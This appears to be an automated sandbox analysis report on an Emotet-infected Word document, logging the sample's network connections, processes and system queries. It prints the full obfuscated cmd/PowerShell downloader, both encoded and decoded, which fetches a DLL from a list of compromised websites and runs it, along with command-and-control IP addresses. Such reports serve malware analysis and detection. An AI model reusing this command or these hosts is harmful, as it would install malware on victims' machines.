Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 132.248.38.158 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 110.172.180.180 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 157.245.145.87 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 161.49.84.2 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"( Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, type: MEMORY
